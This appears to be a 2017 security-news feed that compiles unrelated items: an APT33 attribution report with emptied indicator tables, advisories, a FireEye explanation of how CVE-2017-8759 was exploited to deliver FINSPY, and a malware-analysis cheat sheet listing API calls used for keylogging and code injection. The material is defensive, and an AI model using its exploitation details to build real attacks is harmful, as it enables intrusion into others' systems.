Although we have only directly observed APT33 use DROPSHOT to deliver the TURNEDUP backdoor, we have identified multiple DROPSHOT samples in the wild that drop SHAPESHIFT. The SHAPESHIFT malware is capable of wiping disks, erasing volumes and deleting files, depending on its configuration. Both DROPSHOT and SHAPESHIFT contain Farsi language artifacts, which indicates they may have been developed by a Farsi language speaker (Farsi is the predominant and official language of Iran).

While we have not directly observed APT33 use SHAPESHIFT or otherwise carry out destructive operations, APT33 is the only group that we have observed use the DROPSHOT dropper. It is possible that DROPSHOT may be shared amongst Iran-based threat groups, but we do not have any evidence that this is the case.

In March 2017, Kasperksy released a report that compared DROPSHOT (which they call Stonedrill) with the most recent variant of SHAMOON (referred to as Shamoon 2.0). They stated that both wipers employ anti-emulation techniques and were used to target organizations in Saudi Arabia, but also mentioned several differences. For example, they stated DROPSHOT uses more advanced anti-emulation techniques, utilizes external scripts for self-deletion, and uses memory injection versus external drivers for deployment. Kaspersky also noted the difference in resource language sections: SHAMOON embeds Arabic-Yemen language resources while DROPSHOT embeds Farsi (Persian) language resources.

We have also observed differences in both targeting and tactics, techniques and procedures (TTPs) associated with the group using SHAMOON and APT33. For example, we have observed SHAMOON being used to target government organizations in the Middle East, whereas APT33 has targeted several commercial organizations both in the Middle East and globally. APT33 has also utilized a wide range of custom and publicly available tools during their operations. In contrast, we have not observed the full lifecycle of operations associated with SHAMOON, in part due to the wiper removing artifacts of the earlier stages of the attack lifecycle.

Regardless of whether DROPSHOT is exclusive to APT33, both the malware and the threat activity appear to be distinct from the group using SHAMOON. Therefore, we assess there may be multiple Iran-based threat groups capable of carrying out destructive operations.

Additional Ties Bolster Attribution to Iran

APT33’s targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests, implying that the threat actor is most likely government sponsored. This coupled with the timing of operations – which coincides with Iranian working hours – and the use of multiple Iranian hacker tools and name servers bolsters our assessment that APT33 may have operated on behalf of the Iranian government.

The times of day that APT33 threat actors were active suggests that they were operating in a time zone close to 04:30 hours ahead of Coordinated Universal Time (UTC). The time of the observed attacker activity coincides with Iran’s Daylight Time, which is +0430 UTC.

APT33 largely operated on days that correspond to Iran’s workweek, Saturday to Wednesday. This is evident by the lack of attacker activity on Thursday, as shown in Figure 6. Public sources report that Iran works a Saturday to Wednesday or Saturday to Thursday work week, with government offices closed on Thursday and some private businesses operating on a half day schedule on Thursday. Many other Middle East countries have elected to have a Friday and Saturday weekend. Iran is one of few countries that subscribes to a Saturday to Wednesday workweek.

APT33 leverages popular Iranian hacker tools and DNS servers used by other suspected Iranian threat groups. The publicly available backdoors and tools utilized by APT33 – including NANOCORE, NETWIRE, and ALFA Shell – are all available on Iranian hacking websites, associated with Iranian hackers, and used by other suspected Iranian threat groups. While not conclusive by itself, the use of publicly available Iranian hacking tools and popular Iranian hosting companies may be a result of APT33’s familiarity with them and lends support to the assessment that APT33 may be based in Iran.

Figure 6: APT33 Interactive Commands by Day of Week

Outlook and Implications

Based on observed targeting, we believe APT33 engages in strategic espionage by targeting geographically diverse organizations across multiple industries. Specifically, the targeting of organizations in the aerospace and energy sectors indicates that the threat group is likely in search of strategic intelligence capable of benefitting a government or military sponsor. APT33’s focus on aviation may indicate the group’s desire to gain insight into regional military aviation capabilities to enhance Iran’s aviation capabilities or to support Iran’s military and strategic decision making. Their targeting of multiple holding companies and organizations in the energy sectors align with Iranian national priorities for growth, especially as it relates to increasing petrochemical production. We expect APT33 activity will continue to cover a broad scope of targeted entities, and may spread into other regions and sectors as Iranian interests dictate.

APT33’s use of multiple custom backdoors suggests that they have access to some of their own development resources, with which they can support their operations, while also making use of publicly available tools. The ties to SHAPESHIFT may suggest that APT33 engages in destructive operations or that they share tools or a developer with another Iran-based threat group that conducts destructive operations.


Malware Family Descriptions

Malware Family




Dropper that has been observed dropping and launching the TURNEDUP backdoor, as well as the SHAPESHIFT wiper malware



Publicly available remote access Trojan (RAT) available for purchase. It is a full-featured backdoor with a plugin framework



Backdoor that attempts to steal credentials from the local machine from a variety of sources and supports other standard backdoor features.



Backdoor capable of uploading and downloading files, creating a reverse shell, taking screenshots, and gathering system information


Indicators of Compromise

APT33 Domains Likely Used in Initial Targeting







APT33 Domains / IPs Used for C2

C2 Domain






















Publicly Available Tools used by APT33



Compile Time (UTC)



2017/1/11 2:20



2016/3/9 23:48



2016/6/29 13:44



2016/5/29 14:11

Unattributed DROPSHOT / SHAPESHIFT MD5 Hashes



Compile Time (UTC)




n/a - timestomped



n/a - timestomped



2016/11/14 21:16:40



2016/11/14 21:16:40

APT33 Malware MD5 Hashes



Compile Time (UTC)



2016/10/19 14:26



2014/6/1 11:01



2016/9/18 10:50



2016/3/8 12:34



2016/3/8 12:34



2015/3/12 5:59



2015/3/12 5:59



2015/3/12 5:59



2015/3/9 16:56



2015/3/9 16:56



2015/3/9 16:56



2015/3/9 16:56



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2013/4/10 10:43



2013/4/10 10:43



2013/4/10 10:43

Telaxus Epesi arbitrary Execute Code Cross Site Scripting Vulnerability

Multiple Cross-Site Scripting (XSS) issues were discovered in EPESI The vulnerabilities exist due to insufficient filtration of user-supplied data (cid, value, element, mode, tab, form_name, id) passed to the EPESI-master/modules/Utils/RecordBrowser/grid.php URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website..

Hack Naked News #141 – September 18, 2017

CCleaner is distributing malware, rogue WordPress plugins, Equifax replaces key staff members, and more. Jason Wood of Paladin Security discusses malicious WordPress plugins on this episode of Hack Naked News!Full Show Notes:

Visit for all the latest episodes!

Heads up: Malware found in Piriform’s CCleaner installer

If you installed the free version of CCleaner after Aug. 15, a couple of nasty programs came along for the ride. Talos Intelligence, a division of Cisco, just published a damning account of malware that it found hiding in the installer for CCleaner 5.33, the version that was released on Aug. 15 and which, according to Talos, was still the primary download on the official CCleaner page on Sept. 11.

After notifying Piriform, CCleaner was, ahem, cleaned up and version 5.34 appeared on Sept. 12.

I just checked, and the current version available from Piriform is version 5.34. (Piriform was bought by antivirus giant Avast in July.)

To read this article in full, please click here

5 Ways to Secure Wi-Fi Networks

Wi-Fi is one entry-point hackers can use to get into your network without setting foot inside your building because wireless is much more open to eavesdroppers than wired networks, which means you have to be more diligent about security.

But there’s a lot more to Wi-Fi security than just setting a simple password. Investing time in learning about and applying enhanced security measures can go a long way toward better protecting your network. Here are six tips to betters secure your Wi-Fi network.

Use an inconspicuous network name (SSID)

The service set identifier (SSID) is one of the most basic Wi-Fi network settings. Though it doesn’t seem like the network name could compromise security, it certainly can. Using a too common of a SSID, like “wireless” or the vendor’s default name, can make it easier for someone to crack the personal mode of WPA or WPA2 security. This is because the encryption algorithm incorporates the SSID, and password cracking dictionaries used by hackers are preloaded with common and default SSIDs. Using one of those just makes the hacker’s job easier.

To read this article in full, please click here

Malware spam: "Status of invoice" with .7z attachment

This spam leads to Locky ransomware: Subject:       Status of invoice From:       "Rosella Setter" ordering@[redacted] Date:       Mon, September 18, 2017 9:30 am Hello, Could you please let me know the status of the attached invoice? I appreciate your help! Best regards, Rosella Setter Tel: 206-575-8068 x 100 Fax: 206-575-8094 *NEW*   Ordering@[redacted].com * Kindly note we will be

Startup Security Weekly #55 – Bald, Beautiful Men

Jason Brvenik of NSS Labs joins us. In the news, attributes of a scalable business, founder struggles, how to grow your startup, and updates from AppGuard, Securonix, CashShield, and more on this episode of Startup Security Weekly!Full Show Notes: for all the latest episodes!

Pagekit 1.0.10 Remote Code Execution Vulnerability

An issue was discovered in Pagekit CMS before 1.0.11. In this vulnerability the remote attacker is able to reset the registered user's password, when the debug toolbar is enabled. The password is successfully recovered using this exploit. The SecureLayer7 ID is SL7_PGKT_01.

VirusTotal += Avast Mobile Security

We welcome the Avast Mobile Security scanner to VirusTotal. This engine is specialized in Android and reinforces the participation of Avast that already had a multi-platform scanner in our service. In the words of the company:

"Avast Mobile Security is a complete security solution capable of identifying potentially unwanted (PUP) and malicious apps (TRJ). The app protects millions of endpoints on a daily basis using a wide range of cloud and on-device-based detection capabilities. Our hybrid mix of technology, which includes static and dynamic (behavioral) analysis in conjunction with the latest machine learning algorithms allow us to provide state of the art malware protection.

Avast has expressed its commitment to follow the recommendations of AMTSO and, in compliance with our policy, facilitates this review by AV-TEST, an AMTSO-member tester.

Enterprise Security Weekly #61 – Crying Uncle

Tom Parker of Accenture joins us. In the news, Bay Dynamics and VMware join forces, confessions of an insecure coder, Flexera acquires BDNA, and more on this episode of Enterprise Security Weekly!Full Show Notes:

Visit for all the latest episodes!

Hack Naked News #140 – September 12, 2017

Bypassing Windows 10 security software, Android is vulnerable (go figure), hacking syringe infusion pumps to deliver fatal doses, and more. Jason Wood of Paladin Security discusses iOS 11 on this episode of Hack Naked News!Full Show Notes: for all the latest episodes!

FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY

FireEye recently detected a malicious Microsoft Office RTF document that leveraged CVE-2017-8759, a SOAP WSDL parser code injection vulnerability. This vulnerability allows a malicious actor to inject arbitrary code during the parsing of SOAP WSDL definition contents. FireEye analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands.

FireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch to address the vulnerability and security guidance, which can be found here.

FireEye email, endpoint and network products detected the malicious documents.

Vulnerability Used to Target Russian Speakers

The malicious document, “Проект.doc” (MD5: fe5c4d6bb78e170abf5cf3741868ea4c), might have been used to target a Russian speaker. Upon successful exploitation of CVE-2017-8759, the document downloads multiple components (details follow), and eventually launches a FINSPY payload (MD5: a7b990d5f57b244dd17e9a937a41e7f5).

FINSPY malware, also reported as FinFisher or WingBird, is available for purchase as part of a “lawful intercept” capability. Based on this and previous use of FINSPY, we assess with moderate confidence that this malicious document was used by a nation-state to target a Russian-speaking entity for cyber espionage purposes. Additional detections by FireEye’s Dynamic Threat Intelligence system indicates that related activity, though potentially for a different client, might have occurred as early as July 2017.

CVE-2017-8759 WSDL Parser Code Injection

A code injection vulnerability exists in the WSDL parser module within the PrintClientProxy method ( - System.Runtime.Remoting/metadata/wsdlparser.cs,6111). The IsValidUrl does not perform correct validation if provided data that contains a CRLF sequence. This allows an attacker to inject and execute arbitrary code. A portion of the vulnerable code is shown in Figure 1.

Figure 1: Vulnerable WSDL Parser

When multiple address definitions are provided in a SOAP response, the code inserts the “//base.ConfigureProxy(this.GetType(),” string after the first address, commenting out the remaining addresses. However, if a CRLF sequence is in the additional addresses, the code following the CRLF will not be commented out. Figure 2 shows that due to lack validation of CRLF, a System.Diagnostics.Process.Start method call is injected. The generated code will be compiled by csc.exe of .NET framework, and loaded by the Office executables as a DLL.

Figure 2: SOAP definition VS Generated code

The In-the-Wild Attacks

The attacks that FireEye observed in the wild leveraged a Rich Text Format (RTF) document, similar to the CVE-2017-0199 documents we previously reported on. The malicious sampled contained an embedded SOAP monikers to facilitate exploitation (Figure 3).

Figure 3: SOAP Moniker

The payload retrieves the malicious SOAP WSDL definition from an attacker-controlled server. The WSDL parser, implemented in of .NET framework, parses the content and generates a .cs source code at the working directory. The csc.exe of .NET framework then compiles the generated source code into a library, namely http[url path].dll. Microsoft Office then loads the library, completing the exploitation stage.  Figure 4 shows an example library loaded as a result of exploitation.

Figure 4: DLL loaded

Upon successful exploitation, the injected code creates a new process and leverages mshta.exe to retrieve a HTA script named “word.db” from the same server. The HTA script removes the source code, compiled DLL and the PDB files from disk and then downloads and executes the FINSPY malware named “left.jpg,” which in spite of the .jpg extension and “image/jpeg” content-type, is actually an executable. Figure 5 shows the details of the PCAP of this malware transfer.

Figure 5: Live requests

The malware will be placed at %appdata%\Microsoft\Windows\OfficeUpdte-KB[ 6 random numbers ].exe. Figure 6 shows the process create chain under Process Monitor.

Figure 6: Process Created Chain

The Malware

The “left.jpg” (md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant of FINSPY. It leverages heavily obfuscated code that employs a built-in virtual machine – among other anti-analysis techniques – to make reversing more difficult. As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames. This variant runs with a mutex of "WininetStartupMutex0".


CVE-2017-8759 is the second zero-day vulnerability used to distribute FINSPY uncovered by FireEye in 2017. These exposures demonstrate the significant resources available to “lawful intercept” companies and their customers. Furthermore, FINSPY has been sold to multiple clients, suggesting the vulnerability was being used against other targets.

It is possible that CVE-2017-8759 was being used by additional actors. While we have not found evidence of this, the zero day being used to distribute FINSPY in April 2017, CVE-2017-0199 was simultaneously being used by a financially motivated actor. If the actors behind FINSPY obtained this vulnerability from the same source used previously, it is possible that source sold it to additional actors.


Thank you to Dhanesh Kizhakkinan, Joseph Reyes, FireEye Labs Team, FireEye FLARE Team and FireEye iSIGHT Intelligence for their contributions to this blog. We also thank everyone from the Microsoft Security Response Center (MSRC) who worked with us on this issue.

MS16-123 – Important: Security Update for Windows Kernel-Mode Drivers (3192892) – Version: 3.0

Severity Rating: Important
Revision Note: V3.0 (September 12, 2017): Revised the Affected Software table to include Windows 10 Version 1703 for 32-bit Systems and Windows 10 Version 1703 for x64-based Systems because they are affected by CVE-2016-3376. Consumers using Windows 10 are automatically protected. Microsoft recommends that enterprise customers running Windows 10 Version 1703 ensure they have update 4038788 installed to be protected from this vulnerability.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The more severe of the vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of an affected system.

MS16-087 – Critical: Security Update for Windows Print Spooler Components (3170005) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (September 12, 2017): To address known issues with the 3170455 update for CVE-2016-3238, Microsoft has made available the following updates for currently-supported versions of Microsoft Windows: • Rereleased update 3170455 for Windows Server 2008 • Monthly Rollup 4038777 and Security Update 4038779 for Windows 7 and Windows Server 2008 R2 • Monthly Rollup 4038799 and Security Update 4038786 for Windows Server 2012 • Monthly Rollup 4038792 and Security Update 4038793 for Windows 8.1 and Windows Server 2012 R2 • Cumulative Update 4038781 for Windows 10 • Cumulative Update 4038781 for Windows 10 Version 1511 • Cumulative Update 4038782 for Windows 10 Version 1607 and Windows Server 2016. Microsoft recommends that customers running Windows Server 2008 reinstall update 3170455. Microsoft recommends that customers running other supported versions of Windows install the appropriate update. See Microsoft Knowledge Base Article 3170005 ( for more information.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The more severe of the vulnerabilities could allow remote code execution if an attacker is able to execute a man-in-the-middle (MiTM) attack on a workstation or print server, or sets up a rogue print server on a target network.

MS16-095 – Critical: Cumulative Security Update for Internet Explorer (3177356) – Version: 3.0

Severity Rating: Critical
Revision Note: V3.0 (September 12, 2017): Revised the Affected Software table to include Internet Explorer 11 installed on Windows 10 Version 1703 for 32-bit Systems and Internet Explorer 11 installed on Windows 10 Version 1703 for x64-based Systems because they are affected by CVE-2016-3326. Consumers using Windows 10 are automatically protected. Microsoft recommends that enterprise customers running Internet Explorer on Windows 10 Version 1703 ensure they have update 4038788 installed to be protected from this vulnerability. Customers who are running other versions of Windows 10 and who have installed the June cumulative updates do not need to take any further action.
Summary: This security update resolves vulnerabilities in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

MS16-039 – Critical: Security Update for Microsoft Graphics Component (3148522) – Version: 4.0

Severity Rating: Critical
Revision Note: V4.0 (September 12, 2017): Revised the Microsoft Windows affected software table to include Windows 10 Version 1703 for 32-bit Systems and Windows 10 Version 1703 for x64-based Systems because they are affected by CVE-2016-0165. Consumers running Windows 10 are automatically protected. Microsoft recommends that enterprise customers running Windows 10 Version 1703 ensure they have update 4038788 installed to be protected from this vulnerability.
Summary: This security update resolves vulnerabilities in Microsoft Windows, Microsoft .NET Framework, Microsoft Office, Skype for Business, and Microsoft Lync. The most severe of the vulnerabilities could allow remote code execution if a user opens a specially crafted document or visits a webpage that contains specially crafted embedded fonts.

Toolsmith Tidbit: Windows Auditing with WINspect

WINSpect recently hit the toolsmith radar screen via Twitter, and the author, Amine Mehdaoui, just posted an update a couple of days ago, so no time like the present to give you a walk-through. WINSpect is a Powershell-based Windows Security Auditing Toolbox. According to Amine's GitHub README, WINSpect "is part of a larger project for auditing different areas of Windows environments. It focuses on enumerating different parts of a Windows machine aiming to identify security weaknesses and point to components that need further hardening. The main targets for the current version are domain-joined windows machines. However, some of the functions still apply for standalone workstations."
The current script feature set includes audit checks and enumeration for:

  • Installed security products
  • World-exposed local filesystem shares
  • Domain users and groups with local group membership
  • Registry autoruns
  • Local services that are configurable by Authenticated Users group members
  • Local services for which corresponding binary is writable by Authenticated Users group members
  • Non-system32 Windows Hosted Services and their associated DLLs
  • Local services with unquoted path vulnerability
  • Non-system scheduled tasks
  • DLL hijackability
  • User Account Control settings
  • Unattended installs leftovers
I can see this useful PowerShell script coming in quite handy for assessment using the CIS Top 20 Security Controls. I ran it on my domain-joined Windows 10 Surface Book via a privileged PowerShell and liked the results.

The script confirms that it's running with admin rights, checks PowerShell version, then inspects Windows Firewall settings. Looking good on the firewall, and WINSpect tees right off on my Window Defender instance and its configuration as well.
Not sharing a screenshot of my shares or admin users, sorry, but you'll find them enumerated when you run WINSpect.

 WINSpect then confirmed that UAC was enabled, and that it should notify me only apps try to make changes, then checked my registry for autoruns; no worries on either front, all confirmed as expected.

WINSpect wrapped up with a quick check of configurable services, SMSvcHost is normal as part of .NET, even if I don't like it, but the flowExportService doesn't need to be there at all, I removed that a while ago after being really annoyed with it during testing. No user hosted services, and DLL Safe Search is enable...bonus. Finally, no unattended install leftovers, and all the scheduled tasks are normal for my system. Sweet, pretty good overall, thanks WINSpect. :-)

Give it a try for yourself, and keep an eye out for updates. Amine indicates that Local Security Policy controls, administrative shares configs, loaded DLLs, established/listening connections, and exposed GPO scripts on the to-do list. 
Cheers...until next time.

Tips for Reverse-Engineering Malicious Code

This cheat sheet outlines tips for reversing malicious Windows executables via static and dynamic code analysis with the help of a debugger and a disassembler. To print it, use the one-page PDF version; you can also edit the Word version to customize it for you own needs.

Overview of the Code Analysis Process

  1. Examine static properties of the Windows executable for initial assessment and triage.
  2. Identify strings and API calls that highlight the program’s suspicious or malicious capabilities.
  3. Perform automated and manual behavioral analysis to gather additional details.
  4. If relevant, supplement our understanding by using memory forensics techniques.
  5. Use a disassembler for static analysis to examine code that references risky strings and API calls.
  6. Use a debugger for dynamic analysis to examine how risky strings and API calls are used.
  7. If appropriate, unpack the code and its artifacts.
  8. As your understanding of the code increases, add comments, labels; rename functions, variables.
  9. Progress to examine the code that references or depends upon the code you’ve already analyzed.
  10. Repeat steps 5-9 above as necessary (the order may vary) until analysis objectives are met.

Common 32-Bit Registers and Uses

EAX Addition, multiplication, function results
ECX Counter; used by LOOP and others
EBP Baseline/frame pointer for referencing function arguments (EBP+value) and local variables (EBP-value)
ESP Points to the current “top” of the stack; changes via PUSH, POP, and others
EIP Instruction pointer; points to the next instruction; shellcode gets it via call/pop
EFLAGS Contains flags that store outcomes of computations (e.g., Zero and Carry flags)
FS F segment register; FS[0] points to SEH chain, FS[0x30] points to the PEB.

Common x86 Assembly Instructions

mov EAX,0xB8 Put the value 0xB8 in EAX.
push EAX Put EAX contents on the stack.
pop EAX Remove contents from top of the stack and put them in EAX .
lea EAX,[EBP-4] Put the address of variable EBP-4 in EAX.
call EAX Call the function whose address resides in the EAX register.
add esp,8 Increase ESP by 8 to shrink the stack by two 4-byte arguments.
sub esp,0x54 Shift ESP by 0x54 to make room on the stack for local variable(s).
xor EAX,EAX Set EAX contents to zero.
test EAX,EAX Check whether EAX contains zero, set the appropriate EFLAGS bits.
cmp EAX,0xB8 Compare EAX to 0xB8, set the appropriate EFLAGS bits.

Understanding 64-Bit Registers

  • Additional 64-bit registers are R8-R15.
  • RSP is often used to access stack arguments and local variables, instead of EBP.
  • |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| R8 (64 bits)
    ________________________________|||||||||||||||||||||||||||||||| R8D (32 bits)
    ________________________________________________|||||||||||||||| R8W (16 bits)
    ________________________________________________________|||||||| R8B (8 bits)

Passing Parameters to Functions

arg0 [EBP+8] on 32-bit, RCX on 64-bit
arg1 [EBP+0xC] on 32-bit, RDX on 64-bit
arg2 [EBP+0x10] on 32-bit, R8 on 64-bit
arg3 [EBP+14] on 32-bit, R9 on 64-bit

Decoding Conditional Jumps

JA / JG Jump if above/jump if greater.
JB / JL Jump if below/jump if less.
JE / JZ Jump if equal; same as jump if zero.
JNE / JNZ Jump if not equal; same as jump if not zero.
JGE/ JNL Jump if greater or equal; same as jump if not less.

Some Risky Windows API Calls

  • Code injection: CreateRemoteThread, OpenProcess, VirtualAllocEx, WriteProcessMemory, EnumProcesses
  • Dynamic DLL loading: LoadLibrary, GetProcAddress
  • Memory scraping: CreateToolhelp32Snapshot, OpenProcess, ReadProcessMemory, EnumProcesses
  • Data stealing: GetClipboardData, GetWindowText
  • Keylogging: GetAsyncKeyState, SetWindowsHookEx
  • Embedded resources: FindResource, LockResource
  • Unpacking/self-injection: VirtualAlloc, VirtualProtect
  • Query artifacts: CreateMutex, CreateFile, FindWindow, GetModuleHandle, RegOpenKeyEx
  • Execute a program: WinExec, ShellExecute, CreateProcess
  • Web interactions: InternetOpen, HttpOpenRequest, HttpSendRequest, InternetReadFile

Additional Code Analysis Tips

  • Be patient but persistent; focus on small, manageable code areas and expand from there.
  • Use dynamic code analysis (debugging) for code that’s too difficult to understand statically.
  • Look at jumps and calls to assess how the specimen flows from “interesting” code block to the other.
  • If code analysis is taking too long, consider whether behavioral or memory analysis will achieve the goals.
  • When looking for API calls, know the official API names and the associated native APIs (Nt, Zw, Rtl).


Authored by Lenny Zeltser with feedback from Anuj Soni. Malicious code analysis and related topics are covered in the SANS Institute course FOR610: Reverse-Engineering Malware, which they’ve co-authored. This cheat sheet, version 1.0, is released under the Creative Commons v3 “Attribution” License.

Enterprise Security Weekly #60 – Live From Gainesville

Don Pezet of ITProTV and Doug White join us to discuss network security architecture. In the news, SealPath and Boldon James join forces, following the money, AI in the cloud, and more on this episode of Enterprise Security Weekly!Full Show Notes: for all the latest episodes!

Quit Talking About "Security Culture" – Fix Org Culture!

I have a pet peeve. Ok, I have several, but nonetheless, we're going to talk about one of them today. That pet peeve is security professionals wasting time and energy pushing a "security culture" agenda. This practice of talking about "security culture" has arisen over the past few years. It's largely coming from security awareness circles, though it's not always the case (looking at you anti-phishing vendors intent on selling products without the means and methodology to make them truly useful!).

I see three main problems with references to "security culture," not the least of which being that it continues the bad old practices of days gone by.

1) It's Not Analogous to Safety Culture

First and foremost, you're probably sitting there grinding your teeth saying "But safety culture initiatives work really well!" Yes, they do, but here's why: Safety culture can - and often does - achieve a zero-sum outcome. That is to say, you can reduce safety incidents to ZERO. This factoid is excellent for when you're around construction sites or going to the hospital. However, I have very bad news for you. Information (or cyber or computer) security will never be a zero-sum game. Until the entirety of computing is revolutionized, removing humans from the equation, you will never prevent all incidents. Just imagine your "security culture" sign by the entrance to your local office environment, forever emblazoned with "It Has Been 0 Days Since Our Last Incident." That's not healthy or encouraging. That sort of thing would be outright demoralizing!

Since you can't be 100% successful through preventative security practices, you must then shift mindset to a couple things: better decisions and resilience. Your focus, which most of your "security culture" programs are trying to address (or should be), is helping people make better decisions. Well, I should say, some of you - the few, the proud, the quietly isolated - have this focus. But at the end of the day/week/month/year you'll find that people - including well-trained and highly technical people - will still make mistakes or bad decisions, which means you can't bank on "solving" infosec through better decisions.

As a result, we must still architect for resiliency. We must assume something will breakdown at some point resulting in an incident. When that incident occurs, we must be able to absorb the fault, continue to operate despite degraded conditions, while recovering to "normal" as quickly, efficiently, and effectively as possible. Note, however, that this focus on resiliency doesn't really align well with the "security culture" message. It's akin to telling people "Safety is really important, but since we have no faith in your ability to be safe, here's a first aid kit." (yes, that's a bit harsh, to prove a point, which hopefully you're getting)

2) Once Again, It Creates an "Other"

One of the biggest problems with a typical "security culture" focus is that it once again creates the wrong kind of enablement culture. It says "we're from infosec and we know best - certainly better than you." Why should people work to make better decisions when they can just abdicate that responsibility to infosec? Moreover, since we're trying to optimize resiliency, people can go ahead and make mistakes, no big deal, right?

Part of this is ok, part of it is not. On the one hand, from a DevOps perspective, we want people to experiment, be creative, be innovative. In this sense, resilience and failure are a good thing. However, note that in DevOps, the responsibility for "fail fast, recover fast, learn fast" is on the person doing the experimenting!!! The DevOps movement is diametrically opposed to fostering enablement cultures where people (like developers) don't feel the pain from their bad decisions. It's imperative that people have ownership and responsibility for the things they're doing. Most "security culture" dogma I've seen and heard works against this objective.

We want enablement, but we don't want enablement culture. We want "freedom AND responsibility," "accountability AND transparency," etc, etc, etc. Pushing "security culture" keeps these initiatives separate from other organizational development initiatives, and more importantly it tends to have at best a temporary impact, rather than triggering lasting behavioral change.

3) Your Goal Is Improving the Organization

The last point here is that your goal should be to improve the organization and the overall organizational culture. It should not be focused on point-in-time blips that come and go. Additionally, your efforts must be aimed toward lasting impact and not be anchored around a cult of personality.

As a starting point, you should be working with org dev personnel within your organization, applying behavior design principles. You should be identifying what the target behavior is, then working backward in a piecemeal fashion to determine whether that behavior can be evoked and institutionalized through one step or multiple steps. It may even take years to accomplish the desired changes.

Another key reason for working with your org dev folks is because you need to ensure that anything "culture" that you're pursuing is fully aligned with other org culture initiatives. People can only assimilate so many changes at once, so it's often better to align your work with efforts that are already underway in order to build reinforcing patterns. The worst thing you can do is design for a behavior that is in conflict with other behavior and culture designs underway.

All of this is to underline the key point that "security culture" is the wrong focus, and can in some cases even detract from other org culture initiatives. You want to improve decision-making, but you have to do this one behavior at a time, and glossing over it with the "security culture" label is unhelpful.

Lastly, you need to think about your desired behavior and culture improvements in the broader context of organizational culture. Do yourself a favor and go read Laloux's Reinventing Organizations for an excellent treatise on a desirable future state (one that aligns extremely well with DevOps). As you read Laloux, think about how you can design for security behaviors in a self-managed world. That's the lens through which you should view things, and this is where you'll realize a "security culture" focus is at best distracting.

So... where should you go from here? The answer is three-fold:
1) Identify and design for desirable behaviors
2) Work to make those behaviors easy and sustainable
3) Work to shape organizational culture as a whole

Definitionally, here are a couple starters for you...

First, per Fogg, Behavior happens when three things come together: Motivation, Ability (how hard or easy it is to do the action), and a Trigger (a prompt or cue). When Motivation is high and it's easy to do, then it doesn't take much prompting to trigger an action. However, if it's difficult to take the action, or the motivation simply isn't there, you must then start looking for ways to address those factors in order to achieve the desired behavioral outcome once triggered. This is the basis of behavior design.

Second, when you think about culture, think of it as the aggregate of behaviors collectively performed by the organization, along with the values the organization holds. It may be helpful, as Laloux suggests, to think of the organization as its own person that has intrinsic motivations, values, and behaviors. Eliciting behavior change from the organization is, then, tantamount to changing the organizational culture.

If you put this all together, I think you'll agree with me that talking about "security culture" is anathema to the desired outcomes. Thinking about behavior design in the context of organizational culture shift will provide a better path to improvement, while also making it easier to explain the objectives to non-security people and to get buy-in on lasting change.

Bonus reference: You might find this article interesting as it pertains to evoking behavior change in others.

Good luck!

QTUM Cryptocurrency spam

This spam email appears to be sent by the Necurs botnet, advertising a new Bitcoin-like cryptocurrency called QTUM. Necurs is often used to pump malware, pharma and data spam and sometimes stock pump and dump. There is no guarantee that this is actually being sent by the people running QTUM, it could simply be a Joe Job to disrupt operations. Given some of the wording alluding to illegal

Hack Naked News #139 – September 5, 2017

AT&T customers at risk, WikiLeaks gets vandalized, catching hackers in the act, going to jail over VPNs, and more. Jason Wood of Paladin Security discusses wheeling and dealing malware on this episode of Hack Naked News!Full Show Notes: for all the latest episodes!

Malware spam: "Scanning" pretending to be from

This spam email pretends to be from but it is just a simple forgery leading to Locky ransomware. There is both a malicious attachment and link in the body text. The name of the sender varies. Subject:       ScanningFrom:       "Jeanette Randels" []Date:       Thu, May 18, 2017 8:26 pm Jeanette Randels

Startup Security Weekly #53 – Pulling Your G-String

Matt Alderman of Automox joins us. In the news, changing your audience’s perceptions, improving sales efforts, letting your kids fail, and updates from Facebook, Juniper, Qadium, and more on this episode of Startup Security Weekly!

Full Show Notes:

Visit for all the latest episodes!

QOTD – On Learning (New Things)

The further along you are in your career, the easier it is to fall back on the mistaken assumption that you’ve made it and have all the skills you need to succeed. The tendency is to focus all your energy on getting the job done, assuming that the rest will take care of itself. Big mistake.
The primary takeaway from Dweck’s research is that we should never stop learning. The moment we think that we are who we are is the moment we give away our unrealized potential.
The act of learning is every bit as important as what you learn. Believing that you can improve yourself and do things in the future that are beyond your current possibilities is exciting and fulfilling.
 -- Dr Travis Bradberry , Coauthor of Emotional Intelligence 2.0 & President at TalentSmart

Src: These are the skills you should learn that will pay off forever | World Economic Forum

Paul’s Security Weekly #528 – DDos Campaign for Memes

Larry Pesce and Dave Kennedy hold down the fort in Paul’s absence! Kyle Wilhoit of DomainTools delivers a tech segment on pivoting off domain information, Dave talks about the upcoming DerbyCon, and we discuss the latest information security news!

Full Show Notes:

Visit for all the latest episodes!